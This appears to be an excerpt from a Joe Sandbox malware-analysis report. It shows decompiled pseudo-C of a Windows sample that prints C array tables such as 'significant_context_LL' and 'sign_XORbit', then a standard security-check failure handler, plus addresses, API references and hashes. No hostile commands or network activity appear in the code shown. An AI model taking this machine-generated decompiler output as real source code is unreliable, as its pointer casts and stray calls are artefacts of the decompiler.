				void* _t758;
				void* _t759;
				void* _t761;
				void* _t762;
				void* _t763;
				void* _t764;
				void* _t765;
				void* _t766;
				void* _t767;
				void* _t768;

				_t747 =  *((intOrPtr*)(_t758 + 0x14));
				_t527 = _t537;
				 *((intOrPtr*)(_t758 + 0x18)) = _t527;
				E00404150(_t747, "\tconst int significant_context_LL[] = {");
				_t759 = _t758 + 8;
				_t749 = 0;
				_t528 = _t527 + 0xc;
				do {
					if(_t749 == (0x88888889 * _t749 >> 0x20 >> 4 << 4) - (0x88888889 * _t749 >> 0x20 >> 4) + (0x88888889 * _t749 >> 0x20 >> 4 << 4) - (0x88888889 * _t749 >> 0x20 >> 4)) {
						E00404A90(_t747, 0xa);
						_t519 =  *((intOrPtr*)( *_t747 + 4));
						_t724 = 0;
						if(( *(_t519 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t519 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
							_t724 = 4;
						}
						_t666 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
						if(_t724 != 0) {
							_t522 =  *(_t666 + 0xc) | _t724;
							if( *((intOrPtr*)(_t666 + 0x38)) == 0) {
								_t522 = _t522 | 0x00000004;
							}
							E004018F0(_t666, _t724, _t747, _t522, 0);
						}
						E00404150(_t747, "\t\t");
						_t759 = _t759 + 8;
					}
					E004048A0(_t747,  *_t528);
					if(_t749 != 0x1ff) {
						E00404150(_t747, ",");
						_push(GetModuleHandleA(0));
						E00408870(_t749);
						_t759 = _t759 + 0xc;
					}
					_t749 = _t749 + 1;
					_t528 = _t528 + 4;
				} while (_t749 < 0x200);
				E00404A90(_t747, 0xa);
				_t290 =  *((intOrPtr*)( *_t747 + 4));
				_t725 = 0;
				if(( *(_t290 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t290 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
					_t725 = 4;
				}
				_t544 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
				if(_t725 != 0) {
					_t510 =  *(_t544 + 0xc) | _t725;
					if( *((intOrPtr*)(_t544 + 0x38)) == 0) {
						_t510 = _t510 | 0x00000004;
					}
					E004018F0(_t544, _t725, _t747, _t510, 0);
				}
				_t291 = E00404150(_t747, "\t};");
				_t761 = _t759 + 8;
				_t726 = _t291;
				E00404A90(_t726, 0xa);
				_t293 =  *((intOrPtr*)( *_t726 + 4));
				_t750 = 0;
				if(( *(_t293 + _t726 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t293 + _t726 + 0x38)))) + 0x34))))() == 0xffffffff) {
					_t750 = 4;
				}
				_t548 =  *((intOrPtr*)( *_t726 + 4)) + _t726;
				if(_t750 != 0) {
					_t504 =  *(_t548 + 0xc) | _t750;
					if( *((intOrPtr*)(_t548 + 0x38)) == 0) {
						_t504 = _t504 | 0x00000004;
					}
					E004018F0(_t548, _t726, _t747, _t504, 0);
				}
				E00404A90(_t747, 0xa);
				_t295 =  *((intOrPtr*)( *_t747 + 4));
				_t727 = 0;
				if(( *(_t295 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t295 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
					_t727 = 4;
				}
				_t552 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
				if(_t727 != 0) {
					_t498 =  *(_t552 + 0xc) | _t727;
					if( *((intOrPtr*)(_t552 + 0x38)) == 0) {
						_t498 = _t498 | 0x00000004;
					}
					E004018F0(_t552, _t727, _t747, _t498, 0);
				}
				E00404A90(_t747, 0xa);
				_t297 =  *((intOrPtr*)( *_t747 + 4));
				_t728 = 0;
				if(( *(_t297 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t297 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
					_t728 = 4;
				}
				_t556 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
				if(_t728 != 0) {
					_t492 =  *(_t556 + 0xc) | _t728;
					if( *((intOrPtr*)(_t556 + 0x38)) == 0) {
						_t492 = _t492 | 0x00000004;
					}
					E004018F0(_t556, _t728, _t747, _t492, 0);
				}
				E00404150(_t747, "\tconst int significant_context_HL[] = {");
				_t762 = _t761 + 8;
				_t751 = 0;
				_t530 =  *((intOrPtr*)(_t761 + 0x18)) + 0x80c;
				do {
					if(_t751 == (0x88888889 * _t751 >> 0x20 >> 4 << 4) - (0x88888889 * _t751 >> 0x20 >> 4) + (0x88888889 * _t751 >> 0x20 >> 4 << 4) - (0x88888889 * _t751 >> 0x20 >> 4)) {
						E00404A90(_t747, 0xa);
						_t483 =  *((intOrPtr*)( *_t747 + 4));
						_t729 = 0;
						if(( *(_t483 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t483 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
							_t729 = 4;
						}
						_t657 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
						if(_t729 != 0) {
							_t486 =  *(_t657 + 0xc) | _t729;
							if( *((intOrPtr*)(_t657 + 0x38)) == 0) {
								_t486 = _t486 | 0x00000004;
							}
							E004018F0(_t657, _t729, _t747, _t486, 0);
						}
						E00404150(_t747, "\t\t");
						_t762 = _t762 + 8;
					}
					E004048A0(_t747,  *_t530);
					if(_t751 != 0x1ff) {
						E00404150(_t747, ",");
						_t762 = _t762 + 8;
					}
					_t751 = _t751 + 1;
					_t530 = _t530 + 4;
				} while (_t751 < 0x200);
				E00404A90(_t747, 0xa);
				_t308 =  *((intOrPtr*)( *_t747 + 4));
				_t730 = 0;
				if(( *(_t308 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t308 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
					_t730 = 4;
				}
				_t563 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
				if(_t730 != 0) {
					_t476 =  *(_t563 + 0xc) | _t730;
					if( *((intOrPtr*)(_t563 + 0x38)) == 0) {
						_t476 = _t476 | 0x00000004;
					}
					E004018F0(_t563, _t730, _t747, _t476, 0);
				}
				_t309 = E00404150(_t747, "\t};");
				_t763 = _t762 + 8;
				_t731 = _t309;
				E00404A90(_t731, 0xa);
				_t311 =  *((intOrPtr*)( *_t731 + 4));
				_t752 = 0;
				if(( *(_t311 + _t731 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t311 + _t731 + 0x38)))) + 0x34))))() == 0xffffffff) {
					_t752 = 4;
				}
				_t567 =  *((intOrPtr*)( *_t731 + 4)) + _t731;
				if(_t752 != 0) {
					_t470 =  *(_t567 + 0xc) | _t752;
					if( *((intOrPtr*)(_t567 + 0x38)) == 0) {
						_t470 = _t470 | 0x00000004;
					}
					E004018F0(_t567, _t731, _t747, _t470, 0);
				}
				E00404A90(_t747, 0xa);
				_t313 =  *((intOrPtr*)( *_t747 + 4));
				_t732 = 0;
				if(( *(_t313 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t313 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
					_t732 = 4;
				}
				_t571 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
				if(_t732 != 0) {
					_t464 =  *(_t571 + 0xc) | _t732;
					if( *((intOrPtr*)(_t571 + 0x38)) == 0) {
						_t464 = _t464 | 0x00000004;
					}
					E004018F0(_t571, _t732, _t747, _t464, 0);
				}
				E00404A90(_t747, 0xa);
				_t315 =  *((intOrPtr*)( *_t747 + 4));
				_t733 = 0;
				if(( *(_t315 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t315 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
					_t733 = 4;
				}
				_t575 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
				if(_t733 != 0) {
					_t458 =  *(_t575 + 0xc) | _t733;
					if( *((intOrPtr*)(_t575 + 0x38)) == 0) {
						_t458 = _t458 | 0x00000004;
					}
					E004018F0(_t575, _t733, _t747, _t458, 0);
				}
				E00404150(_t747, "\tconst int significant_context_HH[] = {");
				_t764 = _t763 + 8;
				_t753 = 0;
				_t532 =  *((intOrPtr*)(_t763 + 0x18)) + 0x100c;
				do {
					if(_t753 == (0x88888889 * _t753 >> 0x20 >> 4 << 4) - (0x88888889 * _t753 >> 0x20 >> 4) + (0x88888889 * _t753 >> 0x20 >> 4 << 4) - (0x88888889 * _t753 >> 0x20 >> 4)) {
						E00404A90(_t747, 0xa);
						_t449 =  *((intOrPtr*)( *_t747 + 4));
						_t734 = 0;
						if(( *(_t449 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t449 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
							_t734 = 4;
						}
						_t648 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
						if(_t734 != 0) {
							_t452 =  *(_t648 + 0xc) | _t734;
							if( *((intOrPtr*)(_t648 + 0x38)) == 0) {
								_t452 = _t452 | 0x00000004;
							}
							E004018F0(_t648, _t734, _t747, _t452, 0);
						}
						E00404150(_t747, "\t\t");
						_t764 = _t764 + 8;
					}
					E004048A0(_t747,  *_t532);
					if(_t753 != 0x1ff) {
						E00404150(_t747, ",");
						_t764 = _t764 + 8;
					}
					_t753 = _t753 + 1;
					_t532 = _t532 + 4;
				} while (_t753 < 0x200);
				E00404A90(_t747, 0xa);
				_t326 =  *((intOrPtr*)( *_t747 + 4));
				_t735 = 0;
				if(( *(_t326 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t326 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
					_t735 = 4;
				}
				_t582 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
				if(_t735 != 0) {
					_t442 =  *(_t582 + 0xc) | _t735;
					if( *((intOrPtr*)(_t582 + 0x38)) == 0) {
						_t442 = _t442 | 0x00000004;
					}
					E004018F0(_t582, _t735, _t747, _t442, 0);
				}
				_t327 = E00404150(_t747, "\t};");
				_t765 = _t764 + 8;
				_t736 = _t327;
				E00404A90(_t736, 0xa);
				_t329 =  *((intOrPtr*)( *_t736 + 4));
				_t754 = 0;
				if(( *(_t329 + _t736 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t329 + _t736 + 0x38)))) + 0x34))))() == 0xffffffff) {
					_t754 = 4;
				}
				_t586 =  *((intOrPtr*)( *_t736 + 4)) + _t736;
				if(_t754 != 0) {
					_t436 =  *(_t586 + 0xc) | _t754;
					if( *((intOrPtr*)(_t586 + 0x38)) == 0) {
						_t436 = _t436 | 0x00000004;
					}
					E004018F0(_t586, _t736, _t747, _t436, 0);
				}
				E00404A90(_t747, 0xa);
				_t331 =  *((intOrPtr*)( *_t747 + 4));
				_t737 = 0;
				if(( *(_t331 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
					_t737 = 4;
				}
				_t590 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
				if(_t737 != 0) {
					_t430 =  *(_t590 + 0xc) | _t737;
					if( *((intOrPtr*)(_t590 + 0x38)) == 0) {
						_t430 = _t430 | 0x00000004;
					}
					E004018F0(_t590, _t737, _t747, _t430, 0);
				}
				E00404A90(_t747, 0xa);
				_t333 =  *((intOrPtr*)( *_t747 + 4));
				_t738 = 0;
				if(( *(_t333 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
					_t738 = 4;
				}
				_t594 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
				if(_t738 != 0) {
					_t424 =  *(_t594 + 0xc) | _t738;
					if( *((intOrPtr*)(_t594 + 0x38)) == 0) {
						_t424 = _t424 | 0x00000004;
					}
					E004018F0(_t594, _t738, _t747, _t424, 0);
				}
				E00404150(_t747, "\tconst int sign_context[] = {");
				_t766 = _t765 + 8;
				_t755 = 0;
				_t534 =  *((intOrPtr*)(_t765 + 0x18)) + 0x200c;
				do {
					if(_t755 == (0x88888889 * _t755 >> 0x20 >> 4 << 4) - (0x88888889 * _t755 >> 0x20 >> 4) + (0x88888889 * _t755 >> 0x20 >> 4 << 4) - (0x88888889 * _t755 >> 0x20 >> 4)) {
						E00404A90(_t747, 0xa);
						_t415 =  *((intOrPtr*)( *_t747 + 4));
						_t739 = 0;
						if(( *(_t415 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t415 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
							_t739 = 4;
						}
						_t639 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
						if(_t739 != 0) {
							_t418 =  *(_t639 + 0xc) | _t739;
							if( *((intOrPtr*)(_t639 + 0x38)) == 0) {
								_t418 = _t418 | 0x00000004;
							}
							E004018F0(_t639, _t739, _t747, _t418, 0);
						}
						E00404150(_t747, "\t\t");
						_t766 = _t766 + 8;
					}
					E004048A0(_t747,  *_t534);
					if(_t755 != 0xff) {
						E00404150(_t747, ",");
						_t766 = _t766 + 8;
					}
					_t755 = _t755 + 1;
					_t534 = _t534 + 4;
				} while (_t755 < 0x100);
				E00404A90(_t747, 0xa);
				_t344 =  *((intOrPtr*)( *_t747 + 4));
				_t740 = 0;
				if(( *(_t344 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t344 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
					_t740 = 4;
				}
				_t601 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
				if(_t740 != 0) {
					_t408 =  *(_t601 + 0xc) | _t740;
					if( *((intOrPtr*)(_t601 + 0x38)) == 0) {
						_t408 = _t408 | 0x00000004;
					}
					E004018F0(_t601, _t740, _t747, _t408, 0);
				}
				_t345 = E00404150(_t747, "\t};");
				_t767 = _t766 + 8;
				_t741 = _t345;
				E00404A90(_t741, 0xa);
				_t347 =  *((intOrPtr*)( *_t741 + 4));
				_t756 = 0;
				if(( *(_t347 + _t741 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t347 + _t741 + 0x38)))) + 0x34))))() == 0xffffffff) {
					_t756 = 4;
				}
				_t605 =  *((intOrPtr*)( *_t741 + 4)) + _t741;
				if(_t756 != 0) {
					_t402 =  *(_t605 + 0xc) | _t756;
					if( *((intOrPtr*)(_t605 + 0x38)) == 0) {
						_t402 = _t402 | 0x00000004;
					}
					E004018F0(_t605, _t741, _t747, _t402, 0);
				}
				E00404A90(_t747, 0xa);
				_t349 =  *((intOrPtr*)( *_t747 + 4));
				_t742 = 0;
				if(( *(_t349 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t349 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
					_t742 = 4;
				}
				_t609 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
				if(_t742 != 0) {
					_t396 =  *(_t609 + 0xc) | _t742;
					if( *((intOrPtr*)(_t609 + 0x38)) == 0) {
						_t396 = _t396 | 0x00000004;
					}
					E004018F0(_t609, _t742, _t747, _t396, 0);
				}
				E00404A90(_t747, 0xa);
				_t351 =  *((intOrPtr*)( *_t747 + 4));
				_t743 = 0;
				if(( *(_t351 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t351 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
					_t743 = 4;
				}
				_t613 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
				if(_t743 != 0) {
					_t390 =  *(_t613 + 0xc) | _t743;
					if( *((intOrPtr*)(_t613 + 0x38)) == 0) {
						_t390 = _t390 | 0x00000004;
					}
					E004018F0(_t613, _t743, _t747, _t390, 0);
				}
				E00404150(_t747, "\tconst int sign_XORbit[] = {");
				_t768 = _t767 + 8;
				_t757 = 0;
				_t536 =  *((intOrPtr*)(_t767 + 0x18)) + 0x240c;
				do {
					if(_t757 == (0x88888889 * _t757 >> 0x20 >> 4 << 4) - (0x88888889 * _t757 >> 0x20 >> 4) + (0x88888889 * _t757 >> 0x20 >> 4 << 4) - (0x88888889 * _t757 >> 0x20 >> 4)) {
						E00404A90(_t747, 0xa);
						_t379 =  *((intOrPtr*)( *_t747 + 4));
						_t744 = 0;
						if(( *(_t379 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t379 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
							_t744 = 4;
						}
						_t630 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
						if(_t744 != 0) {
							_t384 =  *(_t630 + 0xc) | _t744;
							if( *((intOrPtr*)(_t630 + 0x38)) == 0) {
								_t384 = _t384 | 0x00000004;
							}
							E004018F0(_t630, _t744, _t747, _t384, 0);
						}
						E00404150(_t747, "\t\t");
						_push(GetModuleHandleA(0));
						E00408B20();
						_t768 = _t768 + 0xc;
					}
					E004048A0(_t747,  *_t536);
					if(_t757 != 0xff) {
						E00404150(_t747, ",");
						_t768 = _t768 + 8;
					}
					_t757 = _t757 + 1;
					_t536 = _t536 + 4;
				} while (_t757 < 0x100);
				E00404A90(_t747, 0xa);
				_t362 =  *((intOrPtr*)( *_t747 + 4));
				_t745 = 0;
				if(( *(_t362 + _t747 + 0xc) & 0x00000006) == 0 &&  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t362 + _t747 + 0x38)))) + 0x34))))() == 0xffffffff) {
					_t745 = 4;
				}
				_t620 =  *((intOrPtr*)( *_t747 + 4)) + _t747;
				if(_t745 != 0) {
					_t372 =  *(_t620 + 0xc) | _t745;
					if( *((intOrPtr*)(_t620 + 0x38)) == 0) {
						_t372 = _t372 | 0x00000004;
					}
					E004018F0(_t620, _t745, _t747, _t372, 0);
				}
				_t748 = E00404150(_t747, "\t};");
				E00404A90(_t748, 0xa);
				_t365 =  *((intOrPtr*)( *_t748 + 4));
				_t746 = 0;
				if(( *(_t365 + _t748 + 0xc) & 0x00000006) == 0) {
					_t365 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t365 + _t748 + 0x38)))) + 0x34))))();
					if(_t365 == 0xffffffff) {
						_t746 = 4;
					}
				}
				_t624 =  *((intOrPtr*)( *_t748 + 4)) + _t748;
				if(_t746 == 0) {
					return _t365;
				} else {
					_t367 =  *(_t624 + 0xc) | _t746;
					if( *((intOrPtr*)(_t624 + 0x38)) == 0) {
						_t367 = _t367 | 0x00000004;
					}
					return E004018F0(_t624, _t746, _t748, _t367, 0);
				}
			}

0x00405904
0x00405909
0x00405911
0x00405915
0x0040591a
0x0040591d
0x0040591f
0x00405922
0x00405939
0x0040593f
0x00405946
0x00405949
0x00405950
0x00405964
0x00405964
0x0040596e
0x00405972
0x00405977
0x0040597d
0x0040597f
0x0040597f
0x00405985
0x00405985
0x00405990
0x00405995
0x00405995
0x0040599d
0x004059a8
0x004059b0
0x004059c0
0x004059c1
0x004059c6
0x004059c6
0x004059c9
0x004059ca
0x004059cd
0x004059dd
0x004059e4
0x004059e7
0x004059ee
0x00405a02
0x00405a02
0x00405a0c
0x00405a10
0x00405a15
0x00405a1b
0x00405a1d
0x00405a1d
0x00405a23
0x00405a23
0x00405a2e
0x00405a33
0x00405a36
0x00405a3c
0x00405a43
0x00405a46
0x00405a4d
0x00405a61
0x00405a61
0x00405a6b
0x00405a6f
0x00405a74
0x00405a7a
0x00405a7c
0x00405a7c
0x00405a82
0x00405a82
0x00405a8b
0x00405a92
0x00405a95
0x00405a9c
0x00405ab0
0x00405ab0
0x00405aba
0x00405abe
0x00405ac3
0x00405ac9
0x00405acb
0x00405acb
0x00405ad1
0x00405ad1
0x00405ada
0x00405ae1
0x00405ae4
0x00405aeb
0x00405aff
0x00405aff
0x00405b09
0x00405b0d
0x00405b12
0x00405b18
0x00405b1a
0x00405b1a
0x00405b20
0x00405b20
0x00405b2b
0x00405b34
0x00405b37
0x00405b39
0x00405b40
0x00405b57
0x00405b5d
0x00405b64
0x00405b67
0x00405b6e
0x00405b82
0x00405b82
0x00405b8c
0x00405b90
0x00405b95
0x00405b9b
0x00405b9d
0x00405b9d
0x00405ba3
0x00405ba3
0x00405bae
0x00405bb3
0x00405bb3
0x00405bbb
0x00405bc6
0x00405bce
0x00405bd3
0x00405bd3
0x00405bd6
0x00405bd7
0x00405bda
0x00405bea
0x00405bf1
0x00405bf4
0x00405bfb
0x00405c0f
0x00405c0f
0x00405c19
0x00405c1d
0x00405c22
0x00405c28
0x00405c2a
0x00405c2a
0x00405c30
0x00405c30
0x00405c3b
0x00405c40
0x00405c43
0x00405c49
0x00405c50
0x00405c53
0x00405c5a
0x00405c6e
0x00405c6e
0x00405c78
0x00405c7c
0x00405c81
0x00405c87
0x00405c89
0x00405c89
0x00405c8f
0x00405c8f
0x00405c98
0x00405c9f
0x00405ca2
0x00405ca9
0x00405cbd
0x00405cbd
0x00405cc7
0x00405ccb
0x00405cd0
0x00405cd6
0x00405cd8
0x00405cd8
0x00405cde
0x00405cde
0x00405ce7
0x00405cee
0x00405cf1
0x00405cf8
0x00405d0c
0x00405d0c
0x00405d16
0x00405d1a
0x00405d1f
0x00405d25
0x00405d27
0x00405d27
0x00405d2d
0x00405d2d
0x00405d38
0x00405d41
0x00405d44
0x00405d46
0x00405d50
0x00405d67
0x00405d6d
0x00405d74
0x00405d77
0x00405d7e
0x00405d92
0x00405d92
0x00405d9c
0x00405da0
0x00405da5
0x00405dab
0x00405dad
0x00405dad
0x00405db3
0x00405db3
0x00405dbe
0x00405dc3
0x00405dc3
0x00405dcb
0x00405dd6
0x00405dde
0x00405de3
0x00405de3
0x00405de6
0x00405de7
0x00405dea
0x00405dfa
0x00405e01
0x00405e04
0x00405e0b
0x00405e1f
0x00405e1f
0x00405e29
0x00405e2d
0x00405e32
0x00405e38
0x00405e3a
0x00405e3a
0x00405e40
0x00405e40
0x00405e4b
0x00405e50
0x00405e53
0x00405e59
0x00405e60
0x00405e63
0x00405e6a
0x00405e7e
0x00405e7e
0x00405e88
0x00405e8c
0x00405e91
0x00405e97
0x00405e99
0x00405e99
0x00405e9f
0x00405e9f
0x00405ea8
0x00405eaf
0x00405eb2
0x00405eb9
0x00405ecd
0x00405ecd
0x00405ed7
0x00405edb
0x00405ee0
0x00405ee6
0x00405ee8
0x00405ee8
0x00405eee
0x00405eee
0x00405ef7
0x00405efe
0x00405f01
0x00405f08
0x00405f1c
0x00405f1c
0x00405f26
0x00405f2a
0x00405f2f
0x00405f35
0x00405f37
0x00405f37
0x00405f3d
0x00405f3d
0x00405f48
0x00405f51
0x00405f54
0x00405f56
0x00405f60
0x00405f77
0x00405f7d
0x00405f84
0x00405f87
0x00405f8e
0x00405fa2
0x00405fa2
0x00405fac
0x00405fb0
0x00405fb5
0x00405fbb
0x00405fbd
0x00405fbd
0x00405fc3
0x00405fc3
0x00405fce
0x00405fd3
0x00405fd3
0x00405fdb
0x00405fe6
0x00405fee
0x00405ff3
0x00405ff3
0x00405ff6
0x00405ff7
0x00405ffa
0x0040600a
0x00406011
0x00406014
0x0040601b
0x0040602f
0x0040602f
0x00406039
0x0040603d
0x00406042
0x00406048
0x0040604a
0x0040604a
0x00406050
0x00406050
0x0040605b
0x00406060
0x00406063
0x00406069
0x00406070
0x00406073
0x0040607a
0x0040608e
0x0040608e
0x00406098
0x0040609c
0x004060a1
0x004060a7
0x004060a9
0x004060a9
0x004060af
0x004060af
0x004060b8
0x004060bf
0x004060c2
0x004060c9
0x004060dd
0x004060dd
0x004060e7
0x004060eb
0x004060f0
0x004060f6
0x004060f8
0x004060f8
0x004060fe
0x004060fe
0x00406107
0x0040610e
0x00406111
0x00406118
0x0040612c
0x0040612c
0x00406136
0x0040613a
0x0040613f
0x00406145
0x00406147
0x00406147
0x0040614d
0x0040614d
0x00406158
0x00406161
0x00406164
0x00406166
0x00406170
0x00406187
0x0040618d
0x00406194
0x00406197
0x0040619e
0x004061b2
0x004061b2
0x004061bc
0x004061c0
0x004061c5
0x004061cb
0x004061cd
0x004061cd
0x004061d3
0x004061d3
0x004061de
0x004061ee
0x004061ef
0x004061f4
0x004061f4
0x004061fc
0x00406207
0x0040620f
0x00406214
0x00406214
0x00406217
0x00406218
0x0040621b
0x0040622b
0x00406232
0x00406235
0x0040623c
0x00406250
0x00406250
0x0040625a
0x0040625e
0x00406263
0x00406269
0x0040626b
0x0040626b
0x00406271
0x00406271
0x00406284
0x0040628a
0x00406291
0x00406294
0x0040629b
0x004062a8
0x004062ad
0x004062af
0x004062af
0x004062ad
0x004062b9
0x004062bd
0x004062da
0x004062bf
0x004062c2
0x004062c8
0x004062ca
0x004062ca
0x00000000
0x004062d0

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 004059BA
GetModuleHandleA.KERNEL32(00000000), ref: 004061E8

Strings

const int significant_context_HL[] = {, xrefs: 00405B25
const int sign_XORbit[] = {, xrefs: 00406152
};, xrefs: 00405A28, 00405C35, 00405E45, 00406055, 00406276
const int sign_context[] = {, xrefs: 00405F42
const int significant_context_LL[] = {, xrefs: 0040590B
const int significant_context_HH[] = {, xrefs: 00405D32

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: HandleModule
String ID: const int sign_XORbit[] = {$const int sign_context[] = {$const int significant_context_HH[] = {$const int significant_context_HL[] = {$const int significant_context_LL[] = {$};
API String ID: 4139908857-2989622881
Opcode ID: ad59ab91db36767f1231d4b19dde1b2367dfeebfe8839b240f62d54c100e9712
Instruction ID: e9225e50b31cad3eedbc3aba506032d41c82285aab4fedf2afe74cff03e52c46
Opcode Fuzzy Hash: ad59ab91db36767f1231d4b19dde1b2367dfeebfe8839b240f62d54c100e9712
Instruction Fuzzy Hash: F362B6707006018FD710EA65CC85F267792EF98368F25857DE516AF3D2CA7AED42CB88

Uniqueness

Uniqueness Score: -1.00%

Function 004230EF Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E004230EF(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x4608e0; // 0xb51ec2b3
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x463958 = _t6;
				 *0x463954 = _t22;
				 *0x463950 = _t25;
				 *0x46394c = _t21;
				 *0x463948 = _t27;
				 *0x463944 = _t26;
				 *0x463970 = ss;
				 *0x463964 = cs;
				 *0x463940 = ds;
				 *0x46393c = es;
				 *0x463938 = fs;
				 *0x463934 = gs;
				asm("pushfd");
				_pop( *0x463968);
				 *0x46395c =  *_t31;
				 *0x463960 = _v0;
				 *0x46396c =  &_a4;
				 *0x4638a8 = 0x10001;
				_t11 =  *0x463960; // 0x0
				 *0x46385c = _t11;
				 *0x463850 = 0xc0000409;
				 *0x463854 = 1;
				_t12 =  *0x4608e0; // 0xb51ec2b3
				_v812 = _t12;
				_t13 =  *0x4608e4; // 0x4ae13d4c
				_v808 = _t13;
				 *0x4638a0 = IsDebuggerPresent();
				_push(1);
				E00431AB7(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter("P8F");
				if( *0x4638a0 == 0) {
					_push(1);
					E00431AB7(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x004230ef
0x004230ef
